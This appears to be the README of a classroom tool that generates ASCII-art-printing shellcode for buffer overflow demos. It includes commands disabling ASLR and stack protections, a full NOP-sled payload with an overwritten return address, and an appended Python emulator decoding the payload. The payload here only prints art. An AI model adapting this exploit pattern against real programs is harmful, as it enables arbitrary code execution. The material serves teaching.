# ascii-art-shellcode

Generates shellcode that prints ASCII art, for use in simple buffer overflow examples. Mostly wrote this so I can make examples in class more interesting.

Includes a sample ASCII art file taken from https://asciiart.website/index.php?art=animals/bats

The basic usage below assumes ASLR is disabled (i.e. `sudo sysctl kernel.randomize_va_space=0` on Debian).

## Basic Usage

```sh
$ python3 ./ascii_art_shellcode.py bats.ascii
```

### Output

```
Reading art file bats.ascii
Done reading art file
Need 3 bytes. Adding space characters (\0x20)
Compile line: gcc -fno-builtin -O0 -z execstack -fno-stack-protector -ggdb -mpreferred-stack-boundary=2 -m32 vuln.c -o vuln.out
Run this command to test your overflow: printf "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x31\xc9\x51\xb8\x09\x20\x20\x20\xfe\xc0\x50\x68\x2e\x2e\x2f\x5c\x68\x20\x20\x2f\x5c\x68\x20\x20\x20\x20\xb8\x5f\x09\x20\x20\xfe\xc4\x50\x68\x5f\x2e\x2e\x5f\x68\x20\x20\x20\x5f\x31\xc0\xb0\x01\xc1\xe0\x10\x05\x2f\x5c\x09\x20\x50\x68\x2f\x5c\x2e\x2e\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x04\xb3\x01\x89\xe1\xb2\x24\xcd\x80\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x1f\xd2\xff\xff" | ./vuln.out
```

## Using the output

```sh
$ printf "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x31\xc9\x51\xb8\x09\x20\x20\x20\xfe\xc0\x50\x68\x2e\x2e\x2f\x5c\x68\x20\x20\x2f\x5c\x68\x20\x20\x20\x20\xb8\x5f\x09\x20\x20\xfe\xc4\x50\x68\x5f\x2e\x2e\x5f\x68\x20\x20\x20\x5f\x31\xc0\xb0\x01\xc1\xe0\x10\x05\x2f\x5c\x09\x20\x50\x68\x2f\x5c\x2e\x2e\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x04\xb3\x01\x89\xe1\xb2\x24\xcd\x80\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xff\xd1\xff\xff" | ./vuln.out 0xffffd1ff
/\../\
    __..__
        /\../\

Segmentation fault
```

Note: you might need to change the last few bytes of the payload (the return address) to match the address that the sample vulnerable program prints, depending on how you executed the program. Running it in an IDE tends to offset things a bit.
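To show what the generated bytes actually do, here is an added example (not part of this repository) that parses the printf payload from the "Using the output" block, strips the NOP sleds and the return address, and steps through the small x86 instruction subset the generator emits to rebuild the bytes that its `sys_write` call prints. The trailing NOP sled length (40 bytes) is an assumption; the rest is copied from the output above.

```python
import re, struct

# Payload from "Using the output" above: 12 NOPs, shellcode, trailing sled (assumed 40 NOPs), ret addr 0xffffd1ff.
PAYLOAD = (
    r"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    r"\x31\xc9\x51\xb8\x09\x20\x20\x20\xfe\xc0\x50\x68\x2e\x2e\x2f\x5c\x68\x20\x20\x2f\x5c"
    r"\x68\x20\x20\x20\x20\xb8\x5f\x09\x20\x20\xfe\xc4\x50\x68\x5f\x2e\x2e\x5f\x68\x20\x20"
    r"\x20\x5f\x31\xc0\xb0\x01\xc1\xe0\x10\x05\x2f\x5c\x09\x20\x50\x68\x2f\x5c\x2e\x2e"
    r"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x04\xb3\x01\x89\xe1\xb2\x24\xcd\x80"
    + r"\x90" * 40 + r"\xff\xd1\xff\xff"
)

def parse_printf_escapes(s: str) -> bytes:
    """Turn the \\xNN escapes handed to printf into the bytes vuln.out reads from stdin."""
    return bytes(int(h, 16) for h in re.findall(r"\\x([0-9a-fA-F]{2})", s))

def split_payload(raw: bytes):
    """Return (shellcode with both NOP sleds stripped, return address as an int)."""
    return raw[:-4].strip(b"\x90"), struct.unpack("<I", raw[-4:])[0]

def emulate_write(code: bytes):
    """Model eax/ebx/ecx/edx and the stack (bytes, index 0 == esp) through the generator's
    instruction subset up to int 0x80; return (syscall nr, fd, bytes sys_write prints)."""
    M, r, stack, pc = 0xFFFFFFFF, dict(eax=0, ebx=0, ecx=0, edx=0), b"", 0
    while pc < len(code):
        op, nxt = code[pc], code[pc + 1] if pc + 1 < len(code) else None
        if op == 0x31:                                    # xor reg,reg: zero it
            r[{0xC0: "eax", 0xDB: "ebx", 0xC9: "ecx", 0xD2: "edx"}[nxt]] = 0; pc += 2
        elif op in (0x50, 0x51):                          # push eax / push ecx
            stack = struct.pack("<I", r["eax" if op == 0x50 else "ecx"]) + stack; pc += 1
        elif op == 0x68:                                  # push imm32: four art bytes
            stack = code[pc + 1:pc + 5] + stack; pc += 5
        elif op == 0xB8:                                  # mov eax, imm32
            r["eax"] = struct.unpack("<I", code[pc + 1:pc + 5])[0]; pc += 5
        elif op == 0x05:                                  # add eax, imm32
            r["eax"] = (r["eax"] + struct.unpack("<I", code[pc + 1:pc + 5])[0]) & M; pc += 5
        elif op == 0xFE and nxt in (0xC0, 0xC4):          # inc al / inc ah: turns 0x09 into '\n'
            step, mask = (1, 0xFF) if nxt == 0xC0 else (0x100, 0xFF00)
            r["eax"] = (r["eax"] & ~mask & M) | ((r["eax"] + step) & mask); pc += 2
        elif op in (0xB0, 0xB3, 0xB2):                    # mov al / bl / dl, imm8
            reg = {0xB0: "eax", 0xB3: "ebx", 0xB2: "edx"}[op]
            r[reg] = (r[reg] & 0xFFFFFF00) | nxt; pc += 2
        elif op == 0xC1 and nxt == 0xE0:                  # shl eax, imm8
            r["eax"] = (r["eax"] << code[pc + 2]) & M; pc += 3
        elif op == 0x89 and nxt == 0xE1:                  # mov ecx, esp: buf = offset 0 of our stack image
            r["ecx"] = 0; pc += 2
        elif op == 0xCD and nxt == 0x80:                  # int 0x80: write(ebx, ecx, edx)
            return r["eax"], r["ebx"], stack[r["ecx"]:r["ecx"] + r["edx"]]
        else:
            raise ValueError(f"unsupported opcode {op:#04x} at offset {pc}")
    raise ValueError("shellcode never reached int 0x80")
```

For this payload `emulate_write` reports syscall 4 (`sys_write`) on fd 1 with a length of 0x24, and the 36 returned bytes are the three lines of the bat plus the three padding spaces the generator mentioned when it said "Need 3 bytes".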